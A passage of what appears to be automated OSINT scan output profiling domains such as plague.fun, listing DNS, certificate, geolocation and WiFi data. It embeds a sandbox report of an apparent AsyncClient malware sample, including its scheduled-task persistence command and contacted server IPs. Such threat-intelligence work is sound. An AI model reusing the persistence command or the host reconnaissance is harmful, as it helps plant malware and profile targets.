\nBecause he grabbed you', u'time': u'2022-11-09T04:11:29.103899396Z'}], u'Leaks': None} 51.103.210.236 2022-12-18 00:09:46 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.17:8443 188.114.96.0/24 2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77a6a5060eda22f8-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.28.240 2022-12-18 00:03:13 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-97.w90-116.abo.wanadoo.fr 90.116.166.97 2022-12-18 00:08:30 Physical Location No LeakIX 0 0 1 0 None United States plague.fun 2022-12-18 00:12:19 Physical Location No ipapi.co 0 0 2 0 None Toronto, Ontario, ON, Canada, CA 172.67.190.129 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None CATYLN (Net ID: 00:01:38:86:06:1F) 37.7803446,-122.3906132 2022-12-18 00:12:41 Physical Location No ipapi.co 0 0 2 0 None Toronto, Ontario, ON, Canada, CA 172.67.169.215 2022-12-18 00:08:42 Internet Name No DNS Resolver 0 0 2 0 None www.zerotwo-best-waifu.online [{u'not_after': u'2022-09-18T23:59:59', u'not_before': u'2022-06-20T00:00:00', u'issuer_ca_id': 158800, u'name_value': u'www.zerotwo-best-waifu.online\nzerotwo-best-waifu.online', u'issuer_name': u'C=AT, O=ZeroSSL, CN=ZeroSSL RSA Domain Secure Site CA', u'common_name': u'zerotwo-best-waifu.online', u'serial_number': u'41cf04f8c0f27bcd70733fd3405fa0ad', u'entry_timestamp': u'2022-06-20T00:27:23.743', u'id': 6969470177}, {u'not_after': u'2022-09-18T23:59:59', u'not_before': u'2022-06-20T00:00:00', u'issuer_ca_id': 158800, u'name_value': u'www.zerotwo-best-waifu.online\nzerotwo-best-waifu.online', u'issuer_name': u'C=AT, O=ZeroSSL, CN=ZeroSSL RSA Domain Secure Site CA', u'common_name': u'zerotwo-best-waifu.online', u'serial_number': u'41cf04f8c0f27bcd70733fd3405fa0ad', u'entry_timestamp': u'2022-06-20T00:27:22.018', u'id': 6969470113}] 2022-12-18 00:03:24 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-114.w90-116.abo.wanadoo.fr 90.116.166.114 2022-12-18 00:14:47 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.160:80 188.114.96.0/24 2022-12-18 00:02:50 IPv6 Address No Mnemonic PassiveDNS 13 0 1 0 None 2a06:98c1:3120::1 misogyny.wtf 2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 172.67.190.129 2022-12-18 00:06:52 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': u'Windows Gui', u'classification_tags': [u'evasive'], u'crowdstrike_ai': None, u'total_processes': 7, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': 5, u'submit_name': u'tmp7h3r2oo1', u'signatures': [{u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS"; Key: "")'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"CorExitProcess" (Indicator: "ExitProcess")\n "FlsSetValue" (Indicator: "FlsSetValue")\n "FlsGetValue" (Indicator: "FlsGetValue")\n "GetLastActivePopup" (Indicator: "GetLastActivePopup")\n "GetActiveWindow" (Indicator: "GetActiveWindow")\n "MessageBoxW" (Indicator: "MessageBoxW")\n "ShellExecuteA" (Indicator: "ShellExecuteA")\n "CreateFileA" (Indicator: "CreateFileA")\n "FindResourceA" (Indicator: "FindResourceA")\n "FreeLibrary" (Indicator: "FreeLibrary")\n "LoadResource" (Indicator: "LoadResource")\n "WriteFile" (Indicator: "WriteFile")\n "SizeofResource" (Indicator: "SizeofResource")\n "GetProcAddress" (Indicator: "GetProcAddress")\n "LoadLibraryA" (Indicator: "LoadLibraryA")\n "LockResource" (Indicator: "LockResource")\n "CloseHandle" (Indicator: "CloseHandle")\n "GetWindowsDirectoryA" (Indicator: "GetWindow")\n "GetTempPathA" (Indicator: "GetTempPathA")\n "SHGetSpecialFolderPathA" (Indicator: "SHGetSpecialFolderPathA")'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-80', u'name': u'PE file contains executable sections', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"8ae28c30669d3cffca54e317362a0774438ab3fb859418eeb826e57823a5faf0.bin" has an executable section named ".text"\n "google.exe" has an executable section named ".text"\n "BARBECUE.EXE" has an executable section named ".text"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-26', u'name': u'The input sample possibly contains the RDTSCP instruction', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1497', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1497', u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Found VM detection artifact "RDTSCP trick" in "8ae28c30669d3cffca54e317362a0774438ab3fb859418eeb826e57823a5faf0.bin" (Offset: 2748387)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-3', u'name': u'Runs shell commands', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1059/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1059.003', u'relevance': 5, u'threat_level': 0, u'type': 9, u'description': u'"/c schtasks /create /f /sc onlogon /rl highest /tn "google" /tr \'"%APPDATA%\\google.exe"\' & exit" on 2022-10-14.19:33:01.000\n "/c ""%TEMP%\\tmp138A.tmp.bat""" on 2022-10-14.19:34:00.593'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-120', u'name': u'Contains registry location strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"Software\\"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-96', u'name': u'PE file entrypoint instructions', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"8ae28c30669d3cffca54e317362a0774438ab3fb859418eeb826e57823a5faf0.bin" file has an entrypoint instructions - "call0x405173,jmp0x4030db,movedi, edi,pushebp,movebp, esp,subesp, 0x20,moveax, dword ptr [ebp + 8],pushesi,pushedi,push8,popecx,movesi, 0x40920c,leaedi, [ebp - 0x20],rep movsddword ptr es:[edi], dword ptr [esi],movdword ptr [ebp - 8], eax,moveax, dword ptr [ebp + 0xc],popedi,movdword ptr [ebp - 4], eax,popesi,testeax, eax,je0x403287,testbyte ptr [eax], 8,je0x403287,movdword ptr [ebp - 0xc], 0x1994000,leaeax, [ebp - 0xc],pusheax,pushdword ptr [ebp - 0x10],pushdword ptr [ebp - 0x1c],pushdword ptr [ebp - 0x20],calldword ptr [0x409058],leave,ret8,movedi, edi,pushebp,movebp, esp,subesp, 0x328,"\n "google.exe" file has an entrypoint instructions - "jmpdword ptr [0x402000],addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,"\n "BARBECUE.EXE" file has an entrypoint instructions - "subrsp, 0x28,call0x1400a57b8,addrsp, 0x28,jmp0x1400a50f8,int3,int3,subrsp, 0x28,movr8, qword ptr [r9 + 0x38],movrcx, rdx,movrdx, r9,call0x1400a52a0,moveax, 1,addrsp, 0x28,ret,int3,int3,int3,pushrbx,movr11d, dword ptr [r8],movrbx, rdx,andr11d, 0xfffffff8,movr9, rcx,testbyte ptr [r8], 4,movr10, rcx,je0x1400a52cb,moveax, dword ptr [r8 + 8],movsxdr10, dword ptr [r8 + 4],negeax,addr10, rcx,movsxdrcx, eax,andr10, rcx,movsxdrax, r11d,"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "52.220.121.212:10552"\n "18.139.9.214:10552"\n "18.141.129.246:10552"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "ASYNCCLIENT.EXE" (UID: 00000000-00002976)\n Spawned process "cmd.exe" with commandline "/c schtasks /create /f /sc onlogon /rl highest /tn "google" /tr ..." (UID: 00000000-00000840)\n Spawned process "cmd.exe" with commandline "/c ""%TEMP%\\tmp138A.tmp.bat""" (UID: 00000000-00003680)\n Spawned process "schtasks.exe" with commandline "schtasks /create /f /sc onlogon /rl highest /tn "google" /tr \'" ..." (UID: 00000000-00002492), Spawned process "timeout.exe" with commandline "timeout 3" (UID: 00000000-00003920), Spawned process "google.exe" (UID: 00000000-00002700)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "schtasks.exe" (UID: 00000000-00002492) was launched with new environment variables: "PROMPT="$P$G""'}, {u'category': u'General', u'origin': u'Monitored Target', 34.149.204.188 2022-12-18 00:08:44 Open TCP Port No LeakIX 0 0 1 0 None 20.224.2.213:80 20.224.2.213 2022-12-18 00:12:18 Physical Location No ipapi.co 0 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3037::6815:13f3 2022-12-18 00:03:06 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None api.plague.fun CN=api.plague.fun 2022-12-18 00:25:43 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None lfbn-nic-1-313-193.w90-116.abo.wanadoo.fr 90.116.149.193 2022-12-18 00:59:50 Similar Domain Yes TLD Searcher 1 0 1 0 None misogyny.org misogyny.wtf 2022-12-18 00:03:09 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:2f:49:07:90:93:a8:06:e6:05:0c:26:40:50:ef:77:d7:82 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Jun 25 16:58:02 2022 GMT Not After : Sep 23 16:58:01 2022 GMT Subject: CN=api.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a7:42:04:24:5f:8a:a1:8e:2a:9b:a7:b7:21:0d: a4:62:c8:51:a7:ef:52:40:c8:b5:22:04:eb:5e:8e: 25:d1:44:39:60:05:3e:fb:b9:da:dd:20:85:a9:ea: 54:8d:e2:8f:7c:be:ee:ab:ac:3e:d0:47:4d:7a:58: c4:55:85:fe:80:9b:a8:f2:35:2b:e8:90:54:7e:a1: 7b:0b:62:68:28:70:70:73:be:8e:ca:f3:45:fd:69: 71:33:d8:f2:63:fa:32:9f:a0:84:f5:07:62:63:b8: e8:92:c6:0a:ee:83:9b:26:52:0f:db:a7:0d:05:dd: ed:89:e7:52:91:7d:75:09:d1:34:a8:1d:f5:9e:54: 05:44:af:1f:65:ff:3f:72:7b:89:3a:e1:5e:60:fb: dd:c7:b7:00:dc:e2:58:d6:bc:db:84:6f:37:85:d7: 64:56:f8:ec:73:07:db:33:23:fb:b0:f2:26:2c:a5: 9f:72:c5:f1:51:16:a3:bc:8d:99:9c:f4:7a:b5:18: 7a:21:00:1a:14:0f:eb:75:c7:9b:65:14:6d:c3:ca: 92:cb:2d:35:45:05:0b:26:01:ec:ec:cc:55:4b:57: 38:28:c0:0c:ce:7c:90:a0:9e:77:81:bd:d8:44:50: 93:c4:b3:06:22:00:23:c7:f0:38:45:c6:33:2f:47: ec:a3 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 37:FE:FE:AC:E2:AA:BE:88:2E:59:E7:E5:2B:89:3F:69:6E:86:54:39 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:api.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 6b:c8:33:ec:50:15:45:a2:5f:86:35:33:74:7b:46:0f:03:4e: 8a:0c:96:3b:67:03:21:d3:d0:95:4e:13:11:6d:e8:a4:5d:cc: 6b:6b:b4:94:83:8b:61:29:9e:ef:cc:de:0f:c6:f5:59:37:ba: af:c1:5a:49:7b:b6:50:7c:a5:e0:c6:e0:22:ab:ab:1a:17:d5: 4b:56:cc:5c:c8:02:83:f2:41:b8:fe:7e:2c:6a:f2:f6:f4:fb: 13:7d:8e:77:96:b0:eb:1f:19:88:59:dc:32:42:6d:71:97:65: fb:7a:61:f0:a1:64:5c:21:93:4b:f2:a8:1b:a2:ad:94:94:d9: 2a:67:6f:07:e1:96:51:9f:d3:29:68:77:83:ce:fa:d7:dc:d5: 51:01:40:78:00:08:bb:4e:4f:e2:4f:c4:52:ad:42:16:8f:e6: dd:3b:e1:d9:9e:bd:47:10:92:d2:ff:a2:ca:87:a7:32:63:54: ab:fd:1e:9f:5a:47:0c:53:42:a1:f2:f0:8c:8a:5f:b5:bb:ed: 67:f4:b8:66:cd:13:44:eb:02:f0:2d:b4:68:92:3e:f3:ed:5a: b9:1b:93:5b:07:bc:4d:4b:f0:de:f2:af:47:fc:7e:99:66:e8: ac:5e:e0:96:dc:88:b7:33:36:d6:13:27:16:fa:15:74:86:b8: cf:c7:0c:ba plague.fun 2022-12-18 00:03:36 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:e4:fc:51:db:21:42:a6:26:a1:af:57:d7:7c:1f:09:d4 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:39:27 2022 GMT Not After : Jun 6 17:39:26 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:63:06:0d:b4:4b:4a:57:30:47:e6:68:c4:a0:06: e4:58:1f:c8:0e:38:75:86:1e:73:96:2c:89:c8:ec: 31:ce:7c:ee:7b:5d:74:75:c9:dc:a4:c6:8f:c0:3b: 27:88:0b:98:a2:b9:e4:84:96:c4:e0:e1:7d:26:c6: 1c:f1:97:8d:a0 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 63:2A:32:F5:F5:82:2C:C6:1C:1E:DA:47:97:C6:17:4B:A9:C9:45:6A X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Mar 8 18:39:28.023 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:52:60:7D:D5:E5:D5:CA:63:59:6C:4E:65: 2B:95:7D:B8:79:E9:9C:B0:1E:EA:1B:00:44:16:69:68: A8:6F:8E:69:02:21:00:BE:F3:16:4D:6E:DC:93:23:3F: 42:FA:69:56:9A:86:DA:51:86:0B:5E:E5:2F:D9:1A:20: EF:DE:71:92:E4:22:8B Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Mar 8 18:39:28.153 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:65:EB:BD:E2:C0:23:77:01:75:49:D5:C7: F4:D5:F5:AE:32:BB:FB:13:6C:82:AF:B1:52:2A:48:26: 92:EC:A8:43:02:21:00:9B:0D:38:F6:B4:73:6B:2F:0E: 3B:21:BA:D2:14:2F:DE:81:B9:16:FF:B9:15:60:B4:FC: 76:D6:6C:CD:F8:27:6C Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:2a:d0:0f:e2:66:51:8e:cf:8e:2f:18:f5:f2:39: 5b:75:5e:b7:8c:81:81:c5:94:dd:62:b7:eb:2b:e0:fe:7e:fe: 33:19:14:0e:b2:a7:1e:88:b9:6d:2f:75:79:0e:74:fa:02:30: 2d:50:a4:18:85:74:52:fa:f6:9d:87:92:73:ff:bf:26:46:74: 88:96:14:9a:c3:89:b1:8c:92:f2:af:7d:50:62:c7:5c:1b:83: c9:a0:73:61:25:2b:30:ac:2d:7a:28:85 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None zoom2888 (Net ID: 00:01:38:85:BD:9E) 37.7803446,-122.3906132 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.7.179 2022-12-18 00:37:29 Malicious Affiliate IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [81.88.52.242] https://www.virustotal.com/en/ip-address/81.88.52.242/information/ 81.88.52.242 2022-12-18 00:12:36 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'PAC', u'country_tld': u'.fr', u'ip': u'90.116.166.104', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 66987244, u'country_code': u'FR', u'timezone': u'Europe/Paris', u'city': u'Mandelieu-la-Napoule', u'network': u'90.116.160.0/21', u'languages': u'fr-FR,frp,br,co,ca,eu,oc', u'version': u'IPv4', u'latitude': 43.5482, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'France', u'country_capital': u'Paris', u'org': u'Orange', u'postal': u'06210', u'asn': u'AS3215', u'country': u'FR', u'region': u"Provence-Alpes-C\xf4te d'Azur", u'longitude': 6.9431, u'country_calling_code': u'+33', u'country_area': 547030.0, u'country_code_iso3': u'FRA'} 90.116.166.104 2022-12-18 00:03:05 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None hook.plague.fun [{u'pubkey_sha256': u'eed16361070909e64009401f21e37cfc30dd63ff7c8f701bfc59a6437ea80bc8', u'revoked': False, u'not_after': u'2023-01-04T20:16:47Z', u'id': u'4267275535', u'cert': {u'data': u'MIIEWzCCA0OgAwIBAgISBEOkfSkfFQ5rrIbkS8C+aXGpMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMjEwMDYyMDE2NDhaFw0yMzAxMDQyMDE2NDdaMBoxGDAWBgNVBAMTD2hvb2sucGxhZ3VlLmZ1bjBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABPBtnT5l4ifn+eexQ12bnHGjdIeKYMh/KScMO3AYDmX/4uRsspNtM2FqvzhPBc1bLkkYDMUyXqb4E5KiVBUg8bijggJMMIICSDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFC1yCZkaF0sQg2Dm6zDyUVb2RUvEMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD2hvb2sucGxhZ3VlLmZ1bjBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQYGCisGAQQB1nkCBAIEgfcEgfQA8gB3AN+lXqtogk8fbK3uuF9OPlrqzaISpGpejjsSwCBEXCpzAAABg68od9cAAAQDAEgwRgIhALaVt8ccgCv9ekEt0e4r8AzH1a1KyeAl8WE6QvTHmCO8AiEAsIxy8E+K6Gzp9jQ5IpY8xf+bhGNxzWJ0LSW2XYIHgAAAdwBvU3asMfAxGdiZAKRRFf93FRwR2QLBACkGjbIImjfZEwAAAYOvKHj6AAAEAwBIMEYCIQDagacz+4T5i+hZZ1qzu30jThPGH+7MEcqQ2cfCuIQsLQIhAKVGwH50llOfCZwMCuWmQ7G73k+aFP/KPnEdBlFyTwqgMA0GCSqGSIb3DQEBCwUAA4IBAQBVWuXU/MGRl/xiv+d9q79eKq3Eojjmk4U4tx3T3jIO4kyZTREnCG7Jh2uGcWNSSG+Xgdb509wwajFx+VBypVxZ/HMp0Lg4eidBszgxgFt0iEBcURMpukGrSafo6KEEFYvTwwI6MQiBLqLiQZz1fPFYvexM2Q/nw3Jy3h9QZhcj5d+1Nkle4a8XddkYVJSt4K44rCwJxQEbjzJtfDg+LU8N92T9iXrwQmYUpSayK88UuhAvzK/Qt7p6KXPU88GB/rQpO8ZLVsgZ0jrVcxwTc89ZovPhJuWO/gRAOzFPhNTR8cqlocKfMfRU4v5QSkBxFff/d12iRYKeGb5SqSGFTkHi', u'sha256': u'8841f6cbb8d7c763c61eaa51603a73de43f3a7e57f918aadcf54ea83ea9981a5', u'type': u'cert'}, u'dns_names': [u'hook.plague.fun'], u'tbs_sha256': u'deab41fcd6c330e25320ba419acf0e610bcbe18370b6f3da2b9bbc84eecf29f2', u'not_before': u'2022-10-06T20:16:48Z', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'd6a99ccd0f59c65dd8b49943f7211883117fe3f0254976c963bc69fce14753a7', u'revoked': False, u'not_after': u'2023-01-21T15:38:17Z', u'id': u'4332304429', u'cert': {u'data': 